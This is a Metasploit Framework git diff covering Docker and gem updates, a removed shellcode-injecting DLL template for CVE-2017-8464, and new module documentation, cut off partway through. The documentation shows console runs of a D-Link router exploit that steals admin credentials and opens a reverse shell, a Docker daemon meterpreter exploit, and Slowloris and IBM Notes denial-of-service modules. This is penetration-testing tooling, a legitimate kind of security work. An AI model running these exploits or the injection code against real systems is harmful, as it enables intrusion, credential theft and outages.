diff --git a/.dockerignore b/.dockerignore index a066428ead..b6add3b6e4 100644 --- a/.dockerignore +++ b/.dockerignore @@ -34,7 +34,7 @@ config/database.yml # target config file for testing features/support/targets.yml # simplecov coverage data -coverage +coverage/ doc/ external/source/meterpreter/java/bin external/source/meterpreter/java/build diff --git a/.gitignore b/.gitignore index 233af3374f..8398940932 100644 --- a/.gitignore +++ b/.gitignore @@ -88,6 +88,7 @@ data/meterpreter/ext_server_pivot.*.dll # local docker compose overrides docker-compose.local* +.env # Ignore python bytecode *.pyc diff --git a/.travis.yml b/.travis.yml index ffcbff526b..5d4166a1b4 100644 --- a/.travis.yml +++ b/.travis.yml @@ -25,7 +25,7 @@ matrix: jobs: # build docker image include: - - env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true" + - env: CMD="docker-compose build" DOCKER="true" # we do not need any setup before_install: skip install: skip diff --git a/Dockerfile b/Dockerfile index 1bf0d1c27c..f6c0007042 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,14 +1,17 @@ FROM ruby:2.4.2-alpine -MAINTAINER Rapid7 +LABEL maintainer="Rapid7" ARG BUNDLER_ARGS="--jobs=8 --without development test coverage" ENV APP_HOME /usr/src/metasploit-framework/ ENV MSF_USER msf ENV NMAP_PRIVILEGED="" +ENV BUNDLE_IGNORE_MESSAGES="true" WORKDIR $APP_HOME -COPY Gemfile* m* Rakefile $APP_HOME -COPY lib $APP_HOME/lib +COPY Gemfile* metasploit-framework.gemspec Rakefile $APP_HOME +COPY lib/metasploit/framework/version.rb $APP_HOME/lib/metasploit/framework/version.rb +COPY lib/metasploit/framework/rails_version_constraint.rb $APP_HOME/lib/metasploit/framework/rails_version_constraint.rb +COPY lib/msf/util/helper.rb $APP_HOME/lib/msf/util/helper.rb RUN apk update && \ apk add \ @@ -45,7 +48,7 @@ RUN apk update && \ RUN adduser -g msfconsole -D $MSF_USER RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby) -RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip /usr/bin/nmap +RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap) USER $MSF_USER diff --git a/Gemfile.lock b/Gemfile.lock index 934e2c31f6..5005305830 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.13) + metasploit-framework (4.16.23) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -17,9 +17,9 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.11) + metasploit-payloads (= 1.3.18) metasploit_data_models - metasploit_payloads-mettle (= 0.2.2) + metasploit_payloads-mettle (= 0.2.8) msgpack nessus_rest net-ssh @@ -49,7 +49,7 @@ PATH rex-mime rex-nop rex-ole - rex-powershell (< 0.1.73) + rex-powershell (< 0.1.78) rex-random_identifier rex-registry rex-rop_builder @@ -112,43 +112,43 @@ GEM builder (3.2.3) coderay (1.1.2) concurrent-ruby (1.0.5) - crass (1.0.2) + crass (1.0.3) diff-lcs (1.3) dnsruby (1.60.2) docile (1.1.5) erubis (2.7.0) - factory_girl (4.8.1) + factory_girl (4.9.0) activesupport (>= 3.0.0) - factory_girl_rails (4.8.0) - factory_girl (~> 4.8.0) + factory_girl_rails (4.9.0) + factory_girl (~> 4.9.0) railties (>= 3.0.0) faraday (0.13.1) multipart-post (>= 1.2, < 3) ffi (1.9.18) filesize (0.1.1) fivemat (1.3.5) - google-protobuf (3.4.1.1) - googleapis-common-protos-types (1.0.0) + google-protobuf (3.5.0) + googleapis-common-protos-types (1.0.1) google-protobuf (~> 3.0) - googleauth (0.5.3) + googleauth (0.6.2) faraday (~> 0.12) - jwt (~> 1.4) + jwt (>= 1.4, < 3.0) logging (~> 2.0) memoist (~> 0.12) multi_json (~> 1.11) os (~> 0.9) signet (~> 0.7) - grpc (1.6.7) + grpc (1.7.3) google-protobuf (~> 3.1) googleapis-common-protos-types (~> 1.0.0) - googleauth (~> 0.5.1) + googleauth (>= 0.5.1, < 0.7) hashery (2.1.2) - i18n (0.9.0) + i18n (0.9.1) concurrent-ruby (~> 1.0) jsobfu (0.4.2) rkelly-remix json (2.1.0) - jwt (1.5.6) + jwt (2.1.0) little-plugger (1.1.4) logging (2.2.2) little-plugger (~> 1.1) @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.11) + metasploit-payloads (1.3.18) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -189,11 +189,11 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.2.2) + metasploit_payloads-mettle (0.2.8) method_source (0.9.0) mini_portile2 (2.3.0) minitest (5.10.3) - msgpack (1.1.0) + msgpack (1.2.0) multi_json (1.12.2) multipart-post (2.0.0) nessus_rest (0.1.6) @@ -223,10 +223,10 @@ GEM activerecord (>= 4.0.0) arel (>= 4.0.1) pg_array_parser (~> 0.0.9) - pry (0.11.2) + pry (0.11.3) coderay (~> 1.1.0) method_source (~> 0.9.0) - public_suffix (3.0.0) + public_suffix (3.0.1) rack (1.6.8) rack-test (0.6.3) rack (>= 1.0) @@ -243,16 +243,16 @@ GEM activesupport (= 4.2.10) rake (>= 0.8.7) thor (>= 0.18.1, < 2.0) - rake (12.1.0) + rake (12.3.0) rb-readline (0.5.5) rbnacl (4.0.2) ffi - rbnacl-libsodium (1.0.13) + rbnacl-libsodium (1.0.15.1) rbnacl (>= 3.0.1) - recog (2.1.15) + recog (2.1.17) nokogiri redcarpet (3.4.0) - rex-arch (0.1.11) + rex-arch (0.1.13) rex-text rex-bin_tools (0.1.4) metasm @@ -265,7 +265,7 @@ GEM metasm rex-arch rex-text - rex-exploitation (0.1.15) + rex-exploitation (0.1.16) jsobfu metasm rex-arch @@ -278,7 +278,7 @@ GEM rex-arch rex-ole (0.1.6) rex-text - rex-powershell (0.1.72) + rex-powershell (0.1.77) rex-random_identifier rex-text rex-random_identifier (0.1.4) @@ -288,7 +288,7 @@ GEM metasm rex-core rex-text - rex-socket (0.1.8) + rex-socket (0.1.9) rex-core rex-sslscan (0.1.5) rex-core @@ -311,7 +311,7 @@ GEM rspec-mocks (3.7.0) diff-lcs (>= 1.2.0, < 2.0) rspec-support (~> 3.7.0) - rspec-rails (3.7.1) + rspec-rails (3.7.2) actionpack (>= 3.0) activesupport (>= 3.0) railties (>= 3.0) @@ -348,16 +348,16 @@ GEM thread_safe (0.3.6) timecop (0.9.1) ttfunk (1.5.1) - tzinfo (1.2.3) + tzinfo (1.2.4) thread_safe (~> 0.1) - tzinfo-data (1.2017.2) + tzinfo-data (1.2017.3) tzinfo (>= 1.0.0) windows_error (0.1.2) xdr (2.0.0) activemodel (>= 4.2.7) activesupport (>= 4.2.7) xmlrpc (0.3.0) - yard (0.9.9) + yard (0.9.12) PLATFORMS ruby @@ -378,4 +378,4 @@ DEPENDENCIES yard BUNDLED WITH - 1.15.4 + 1.16.0 diff --git a/README.md b/README.md index 16b401ac91..849f6107cd 100644 --- a/README.md +++ b/README.md @@ -1,4 +1,4 @@ -Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) +Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/) == The Metasploit Framework is released under a BSD-style license. See COPYING for more details. diff --git a/data/exploits/cve-2017-8464/src/build.sh b/data/exploits/cve-2017-8464/src/build.sh deleted file mode 100755 index 878e3e3fa8..0000000000 --- a/data/exploits/cve-2017-8464/src/build.sh +++ /dev/null @@ -1,15 +0,0 @@ -#!/bin/sh -rm -f *.o *.dll - -CCx86="i686-w64-mingw32" -CCx64="x86_64-w64-mingw32" - -${CCx64}-gcc -m64 -c -Os template.c -Wall -shared -${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll -${CCx64}-strip -s temp.dll -o ../template_x64_windows.dll -rm -f temp.dll *.o - -${CCx86}-gcc -c -Os template.c -Wall -shared -${CCx86}-dllwrap --def template.def *.o -o temp.dll -${CCx86}-strip -s temp.dll -o ../template_x86_windows.dll -rm -f temp.dll *.o diff --git a/data/exploits/cve-2017-8464/src/template.c b/data/exploits/cve-2017-8464/src/template.c deleted file mode 100644 index 01553dc914..0000000000 --- a/data/exploits/cve-2017-8464/src/template.c +++ /dev/null @@ -1,95 +0,0 @@ -// Based on https://github.com/rapid7/metasploit-framework/tree/cac890a797d0d770260074dfe703eb5cfb63bd46/data/templates/src/pe/dll -// - removed ExitThread(0) to prevent an Explorer crash -// - added Mutex to prevent invoking payload multiple times (at least try) -#include -#include "template.h" - -void inline_bzero(void *p, size_t l) -{ - BYTE *q = (BYTE *)p; - size_t x = 0; - for (x = 0; x < l; x++) - *(q++) = 0x00; -} - -void ExecutePayload(void); - -BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) -{ - switch (dwReason) - { - case DLL_PROCESS_ATTACH: - ExecutePayload(); - break; - - case DLL_PROCESS_DETACH: - break; - - case DLL_THREAD_ATTACH: - break; - - case DLL_THREAD_DETACH: - break; - } - - return TRUE; -} - -void ExecutePayload(void) -{ - PROCESS_INFORMATION pi; - STARTUPINFO si; - CONTEXT ctx; - LPVOID ep; - HANDLE hMutex; - SECURITY_ATTRIBUTES MutexAttributes; - - inline_bzero(&MutexAttributes, sizeof(MutexAttributes)); - MutexAttributes.nLength = sizeof(MutexAttributes); - MutexAttributes.bInheritHandle = TRUE; // inherit the handle - hMutex = CreateMutex(&MutexAttributes, TRUE, "MsfMutex"); - if(hMutex == NULL) - { - return; - } - - if(GetLastError() == ERROR_ALREADY_EXISTS) - { - CloseHandle(hMutex); - return; - } - - if(GetLastError() == ERROR_ACCESS_DENIED) - { - CloseHandle(hMutex); - return; - } - - // Start up the payload in a new process - inline_bzero(&si, sizeof(si)); - si.cb = sizeof(si); - - // Create a suspended process, write shellcode into stack, resume it - if(CreateProcess(NULL, "rundll32.exe", NULL, NULL, TRUE, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, NULL, NULL, &si, &pi)) { - ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL; - GetThreadContext(pi.hThread, &ctx); - - ep = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE); - WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0); - -#ifdef _WIN64 - ctx.Rip = (DWORD64)ep; -#else - ctx.Eip = (DWORD)ep; -#endif - - SetThreadContext(pi.hThread, &ctx); - ResumeThread(pi.hThread); - - CloseHandle(pi.hThread); - CloseHandle(pi.hProcess); - } - - CloseHandle(hMutex); -} - diff --git a/data/exploits/cve-2017-8464/src/template.h b/data/exploits/cve-2017-8464/src/template.h deleted file mode 100644 index 7a674c3006..0000000000 --- a/data/exploits/cve-2017-8464/src/template.h +++ /dev/null @@ -1,3 +0,0 @@ -#define SCSIZE 2048 -unsigned char code[SCSIZE] = "PAYLOAD:"; - diff --git a/data/exploits/cve-2017-8464/template_x64_windows.dll b/data/exploits/cve-2017-8464/template_x64_windows.dll old mode 100755 new mode 100644 index 40958f8986..b5b0009cdb Binary files a/data/exploits/cve-2017-8464/template_x64_windows.dll and b/data/exploits/cve-2017-8464/template_x64_windows.dll differ diff --git a/data/exploits/cve-2017-8464/template_x86_windows.dll b/data/exploits/cve-2017-8464/template_x86_windows.dll old mode 100755 new mode 100644 index b95dfe5232..45f97128ec Binary files a/data/exploits/cve-2017-8464/template_x86_windows.dll and b/data/exploits/cve-2017-8464/template_x86_windows.dll differ diff --git a/docker/docker-compose.development.override.yml b/docker-compose.override.yml similarity index 78% rename from docker/docker-compose.development.override.yml rename to docker-compose.override.yml index f4ac60633a..134c1e8503 100644 --- a/docker/docker-compose.development.override.yml +++ b/docker-compose.override.yml @@ -1,13 +1,14 @@ -version: '2' +version: '3' services: ms: build: + context: . + dockerfile: ./Dockerfile args: BUNDLER_ARGS: --jobs=8 image: metasploit:dev environment: DATABASE_URL: postgres://postgres@db:5432/msf_dev - volumes: - .:/usr/src/metasploit-framework diff --git a/docker-compose.yml b/docker-compose.yml index 0f433b31fe..725f398500 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -1,10 +1,7 @@ -version: '2' +version: '3' services: ms: - image: metasploit - build: - context: . - dockerfile: ./Dockerfile + image: metasploitframework/metasploit-framework:latest environment: DATABASE_URL: postgres://postgres@db:5432/msf links: @@ -16,7 +13,7 @@ services: - /etc/localtime:/etc/localtime:ro db: - image: postgres:9-alpine + image: postgres:10-alpine volumes: - pg_data:/var/lib/postgresql/data diff --git a/docker/README.md b/docker/README.md index a137b8c327..cec9d02070 100644 --- a/docker/README.md +++ b/docker/README.md @@ -3,43 +3,36 @@ To run `msfconsole` ```bash +docker-compose build docker-compose run --rm --service-ports ms ``` +or +```bash +./docker/bin/msfconsole +``` To run `msfvenom` ```bash -docker-compose run --rm ms ./msfvenom +docker-compose build +docker-compose run --rm --no-deps ms ./msfvenom ``` - -### I don't like typing `docker-compose --rm ...` - -We have included some binstubs `./bin`, you can symlink them to your path. - -Assuming you have `$HOME/bin`, and it's in your `$PATH`. You can run this from the project root: - +or ```bash -ln -s `pwd`/docker/bin/msfconsole $HOME/bin/ -ln -s `pwd`/docker/bin/msfvenom $HOME/bin/ +./docker/bin/msfvenom ``` -If you set the environment variable `MSF_BUILD` the container will be rebuilt. - -```bash -MSF_BUILD=1 ./docker/bin/msfconsole -MSF_BUILD=1 ./docker/bin/msfconsole-dev -``` +You can pass any command line arguments to the binstubs or the docker-compose command and they will be passed to `msfconsole` or `msfvenom`. If you need to rebuild an image (for example when the Gemfile changes) you need to build the docker image using `docker-compose build` or supply the `--rebuild` parameter to the binstubs. ### But I want reverse shells... -By default we expose port `4444`. You'll need to set `LHOST` to be a hostname/ip -of your host machine. +By default we expose port `4444`. If you want to expose more ports, or have `LHOST` prepopulated with a specific value; you'll need to setup a local docker-compose override for this. -Create `docker/docker-compose.local.override.yml` with: +Create `docker-compose.local.override.yml` with: ```yml -version: '2' +version: '3' services: ms: environment: @@ -56,19 +49,6 @@ Now you need to set the `COMPOSE_FILE` environment variable to load your local override. ```bash -echo "COMPOSE_FILE=./docker-compose.yml:./docker/docker-compose.local.override.yml" >> .env +echo "COMPOSE_FILE=./docker-compose.yml:./docker-compose.override.yml:./docker-compose.local.override.yml" >> .env ``` Now you should be able get reverse shells working - -## Developing - -To setup you environment for development, you need to add `docker/docker-compose.development.override.yml` -to your `COMPOSE_FILE` environment variable. - -If you don't have a `COMPOSE_FILE` environment variable, you can set it up with this: - -```bash -echo "COMPOSE_FILE=./docker-compose.yml:./docker/docker-compose.development.override.yml" >> .env -``` - -Alternatively you can also use the `msfconsole-dev` binstub. diff --git a/docker/bin/msfconsole b/docker/bin/msfconsole index a6b0b722f7..b85d150546 100755 --- a/docker/bin/msfconsole +++ b/docker/bin/msfconsole @@ -19,8 +19,12 @@ fi cd $MSF_PATH -if [[ -n "$MSF_BUILD" ]]; then - docker-compose -f $MSF_PATH/docker-compose.yml build +PARAMS="$@" + +if [[ $PARAMS == *"--rebuild"* ]]; then + echo "Rebuilding image" + docker-compose build + exit $? fi -docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@" +docker-compose run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$PARAMS" diff --git a/docker/bin/msfconsole-dev b/docker/bin/msfconsole-dev deleted file mode 100755 index 69cf879975..0000000000 --- a/docker/bin/msfconsole-dev +++ /dev/null @@ -1,27 +0,0 @@ -#! /bin/bash - -if [[ -z "$MSF_PATH" ]]; then - path=`dirname $0` - - # check for ./docker/msfconsole.rc - if [[ ! -f $path/../msfconsole.rc ]] ; then - - # we are not inside the project - realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;} - - # determine script path - pushd $(dirname $(realpath $0)) > /dev/null - path=$(pwd) - popd > /dev/null - fi - MSF_PATH=$(dirname $(dirname $path)) -fi - -cd $MSF_PATH - -if [[ -n "$MSF_BUILD" ]]; then - docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build -fi - -docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfconsole -r docker/msfconsole.rc "$@" - diff --git a/docker/bin/msfvenom b/docker/bin/msfvenom index 3efc05168d..dd0f96cd49 100755 --- a/docker/bin/msfvenom +++ b/docker/bin/msfvenom @@ -17,9 +17,15 @@ if [[ -z "$MSF_PATH" ]]; then MSF_PATH=$(dirname $(dirname $path)) fi -if [[ -n "$MSF_BUILD" ]]; then - docker-compose -f $MSF_PATH/docker-compose.yml build +cd $MSF_PATH + +PARAMS="$@" + +if [[ $PARAMS == *"--rebuild"* ]]; then + echo "Rebuilding image" + docker-compose build + exit $? fi -cd $MSF_PATH -docker-compose run --rm --service-ports ms ./msfvenom "$@" +# we need no database here +docker-compose run --rm --no-deps ms ./msfvenom "$PARAMS" diff --git a/docker/bin/msfvenom-dev b/docker/bin/msfvenom-dev deleted file mode 100755 index 32b1049748..0000000000 --- a/docker/bin/msfvenom-dev +++ /dev/null @@ -1,26 +0,0 @@ -#! /bin/bash - -if [[ -z "$MSF_PATH" ]]; then - path=`dirname $0` - - # check for ./docker/msfconsole.rc - if [[ ! -f $path/../msfconsole.rc ]] ; then - - # we are not inside the project - realpath --version > /dev/null 2>&1 || { echo >&2 "I couldn't find where metasploit is. Set \$MSF_PATH or execute this from the project root"; exit 1 ;} - - # determine script path - pushd $(dirname $(realpath $0)) > /dev/null - path=$(pwd) - popd > /dev/null - fi - MSF_PATH=$(dirname $(dirname $path)) -fi - -cd $MSF_PATH - -if [[ -n "$MSF_BUILD" ]]; then - docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml build -fi - -docker-compose -f $MSF_PATH/docker-compose.yml -f $MSF_PATH/docker/docker-compose.development.override.yml run --rm --service-ports ms ./msfvenom "$@" diff --git a/documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md b/documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md new file mode 100644 index 0000000000..1a79f08bb1 --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/ibm_lotus_notes2.md @@ -0,0 +1,67 @@ +## Vulnerable Application +This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application. + +If a user is persuaded to click on a malicious link, it would open up many file select dialog boxes which, +would cause the client hang and have to be restarted. + +Affected Products and Versions + +IBM Notes 9.0.1 to 9.0.1 FP8 IF1 +IBM Notes 9.0 to 9.0 IF4. +IBM Notes 8.5.3 to 8.5.3 FP6 IF13. +IBM Notes 8.5.2 to 8.5.2 FP4 IF3. +IBM Notes 8.5.1. to 8.5.1 FP5 IF5. +IBM Notes 8.5 release + +Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384 + +## Verification + +Start msfconsole + +`use auxiliary/dos/http/ibm_lotus_notes2.rb` + +Set `SRVHOST` + +Set `SRVPORT` + +run (Server started) +Visit server URL in the built-in web-browser of IBM Notes client application + +## Scenarios + +``` +msf > use auxiliary/dos/http/ibm_lotus_notes2 +msf auxiliary(ibm_lotus_notes2) > show options + +Module options (auxiliary/dos/http/ibm_lotus_notes2): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 + SRVPORT 8080 yes The local port to listen on. + SSL false no Negotiate SSL for incoming connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + URIPATH no The URI to use for this exploit (default is random) + + +Auxiliary action: + + Name Description + ---- ----------- + WebServer + + +msf auxiliary(ibm_lotus_notes2) > set SRVHOST 192.168.0.50 +SRVHOST => 192.168.0.50 +msf auxiliary(ibm_lotus_notes2) > set SRVPORT 9092 +SRVPORT => 9092 +msf auxiliary(ibm_lotus_notes2) > run +[*] Auxiliary module execution completed +msf auxiliary(ibm_lotus_notes2) > +[*] Using URL: http://192.168.0.50:9092/mypath +[*] Server started. +msf auxiliary(ibm_lotus_notes2) > +``` + +At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive. diff --git a/documentation/modules/auxiliary/dos/http/slowloris.md b/documentation/modules/auxiliary/dos/http/slowloris.md new file mode 100644 index 0000000000..dfa1937774 --- /dev/null +++ b/documentation/modules/auxiliary/dos/http/slowloris.md @@ -0,0 +1,47 @@ +## Vulnerable Application + +This module tries to keep many connections to the target web server open and hold them open as long as possible. + +To test this module download and setup the Metasploitable 2 vulnerable Linux virtual machine available at [https://sourceforge.net/projects/metasploitable/files/Metasploitable2/](https://sourceforge.net/projects/metasploitable/files/Metasploitable2/). + +Vulnerable application versions include: + +- Apache HTTP Server 1.x and 2.x +- Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27 and 7.0.0 beta + +## Verification Steps + +1. Start msfconsole +2. Do: `use auxiliary/dos/http/slowloris` +3. Do: `set RHOST` +4. Do: `run` +5. Visit server URL in your web-browser. + +## Scenarios + +### Apache/2.2.8 - Ubuntu 8.04 + +``` +msf > use auxiliary/dos/http/slowloris +msf auxiliary(slowloris) > show options + +Module options (auxiliary/dos/http/slowloris): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + delay 15 yes The delay between sending keep-alive headers + rand_user_agent true yes Randomizes user-agent with each request + rhost 172.28.128.4 yes The target address + rport 80 yes The target port + sockets 150 yes The number of sockets to use in the attack + ssl false yes Negotiate SSL/TLS for outgoing connections + +msf auxiliary(slowloris) > set rhost 172.28.128.4 +rhost => 172.28.128.4 +msf auxiliary(slowloris) > run + +[*] Starting server... +[*] Attacking 172.28.128.4 with 150 sockets +[*] Creating sockets... +[*] Sending keep-alive headers... Socket count: 150 +``` diff --git a/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md new file mode 100644 index 0000000000..99809325f4 --- /dev/null +++ b/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md @@ -0,0 +1,64 @@ +The module dlink_dir850_(un)auth_exec leverages an unauthenticated credential disclosure vulnerability to then execute arbitrary commands via an authenticated OS command injection +vulnerability. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07 +are potentially vulnerable. The vulnerability seems to occur within the parsing of the config. Another PoC can be found here https://www.seebug.org/vuldb/ssvid-96333. Setting command to be `reboot` will force the router into an infinite loop. + +## Vulnerable Application + + + 1. Start msfconsole + 2. Do : `use exploit/linux/http/dlink_dir850l_unauth_exec.rb` + 3. Do : `set RHOST [RouterIP]` + 4. Do : `set PAYLOAD linux/mipsbe/shell/reverse_tcp` + 5. Do : `run` + 6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session + + +## Example + +``` +msf > use exploit/linux/http/dlink_dir850l_unauth_exec +msf exploit(dlink_dir850l_unauth_exec) > set RHOST 192.168.0.14 +RHOST => 192.168.0.14 +msf exploit(dlink_dir850l_unauth_exec) > set RPORT 80 +RPORT => 80 +msf exploit(dlink_dir850l_unauth_exec) > check +[*] 192.168.0.14:80 The target service is running, but could not be validated. +msf exploit(dlink_dir850l_unauth_exec) > set VERBOSE true +VERBOSE => true +msf exploit(dlink_dir850l_unauth_exec) > set LHOST ens3 +LHOST => ens3 +msf exploit(dlink_dir850l_unauth_exec) > set LPORT 3131 +LPORT => 3131 +msf exploit(dlink_dir850l_unauth_exec) > run + +[*] Started reverse TCP handler on 192.168.0.11:3131 +[*] 192.168.0.14:80 - Connecting to target... +[+] 192.168.0.14:80 - Retrieved the username/password combo Admin/92830535 +[+] 192.168.0.14:80 - Downloaded credentials to /root/.msf4/loot/20171104113614_default_192.168.0.14_dlink.dir850l.lo_146186.txt +[*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:8080/ZUrlVeWUm +[*] Using URL: http://0.0.0.0:8080/ZUrlVeWUm +[*] Local IP: http://192.168.0.11:8080/ZUrlVeWUm +[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:8080/ZUrlVeWUm +[*] 192.168.0.14:80 - Waiting for target to request the ELF payload... +[*] 192.168.0.14:80 - Sending payload to the server... +[*] 192.168.0.14:80 - Requesting device to chmod ZUrlVeWUm +[*] 192.168.0.14:80 - Requesting device to execute ZUrlVeWUm +[*] 192.168.0.14:80 - Waiting 10 seconds for shell to connect back to us... +[*] Sending stage (84 bytes) to 192.168.0.14 +[*] Command shell session 1 opened (192.168.0.11:3131 -> 192.168.0.14:43953) at 2017-11-04 11:36:26 -0400 +[+] Deleted /tmp/uoskutcy +[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect? +[*] Server stopped. +[*] Exploit completed, but no session was created. +msf exploit(dlink_dir850l_unauth_exec) > sessions -i 1 +[*] Starting interaction with 1... + +190745749 +wUVNdEKSrgeaxdSQyfTyxvaoYgFzyvGj +true +pQfaUhhwMvgnWrLpQXhhUAioNBFHPRZP +OgkEaOTPYbUEOLlLpLFEbodBvHFmVRmH +iNaYBrmsZqFyolPWWRKEHsKglrSlSGkY +pwd +/ +``` diff --git a/documentation/modules/exploit/linux/http/docker_daemon_tcp.md b/documentation/modules/exploit/linux/http/docker_daemon_tcp.md index 4c32e54a03..6e59fc82aa 100644 --- a/documentation/modules/exploit/linux/http/docker_daemon_tcp.md +++ b/documentation/modules/exploit/linux/http/docker_daemon_tcp.md @@ -67,6 +67,8 @@ OK [Disable][5] or [protect][6] the Docker tcp socket. +[User namespaces][7] did **not** protect against this. + # Exploitation This module is designed for the attacker to leverage, creation of a Docker container with out authentication through the Docker tcp socket @@ -88,8 +90,8 @@ to gain root access to the hosting server of the Docker container. msf > use exploit/linux/http/docker_daemon_tcp msf exploit(docker_daemon_tcp) > set RHOST 192.168.66.23 RHOST => 192.168.66.23 -msf exploit(docker_daemon_tcp) > set PAYLOAD python/meterpreter/reverse_tcp -PAYLOAD => python/meterpreter/reverse_tcp +msf exploit(docker_daemon_tcp) > set PAYLOAD linux/x64/meterpreter/reverse_tcp +PAYLOAD => linux/x64/meterpreter/reverse_tcp msf exploit(docker_daemon_tcp) > set LHOST 192.168.66.10 LHOST => 192.168.66.10 msf exploit(docker_daemon_tcp) > set VERBOSE true @@ -108,18 +110,17 @@ msf exploit(docker_daemon_tcp) > run [*] Waiting for the cron job to run, can take up to 60 seconds [*] Waiting until the docker container stopped [*] The docker container has been stopped, now trying to remove it -[*] Sending stage (40411 bytes) to 192.168.66.23 +[*] Sending stage (2878936 bytes) to 192.168.66.23 [*] Meterpreter session 1 opened (192.168.66.10:4444 -> 192.168.66.23:35050) at 2017-07-25 14:03:02 +0200 [+] Deleted /etc/cron.d/lVoepNpy [+] Deleted /tmp/poasDIuZ meterpreter > sysinfo -Computer : debian -OS : Linux 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) -Architecture : x64 -System Language : en_US -Meterpreter : python/linux +Computer : rancher +OS : Debian 9.1 (Linux 4.9.0-3-amd64) +Architecture : x64 +Meterpreter : x64/linux meterpreter > ``` @@ -129,3 +130,4 @@ meterpreter > [4]:https://docs.docker.com/engine/admin/systemd/ [5]:https://docs.docker.com/engine/reference/commandline/dockerd/#options [6]:https://docs.docker.com/engine/security/https/ +[7]:https://docs.docker.com/engine/security/userns-remap/#disable-namespace-remapping-for-a-container diff --git a/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md b/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md new file mode 100644 index 0000000000..5732e42b71 --- /dev/null +++ b/documentation/modules/exploit/multi/http/makoserver_cmd_exec.md @@ -0,0 +1,251 @@ +## Description + + This module exploits a vulnerability found in Mako Server v2.5, 2.6. + It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp. + + Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391 + +## Vulnerable Application + + [Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications. + + This module has been verified against the following Mako Server versions for Windows XP SP3, Windows 7 SP1 and Linux Ubuntu 16.04 LTS: + - v2.5 + - v2.6 + + Links: + - [Windows x86 installer](https://makoserver.net/download/mako.windows.x86.exe) + - [Windows download page](https://makoserver.net/download/windows) + - [Linux x64 installer](https://makoserver.net/download/mako.linux-x64.tar.gz) + - [Linux download page](https://makoserver.net/download/linux-x86) + - [Documentation](https://makoserver.net/download/manual) + +## References for vulnerability + - https://blogs.securiteam.com/index.php/archives/3391 + - https://www.exploit-db.com/exploits/42683 + +## Verification Steps for Windows + + 1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work) + 2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop + 4. Start msfconsole on host + 5. Do: ```use exploit/multi/http/makoserver_cmd_exec``` + 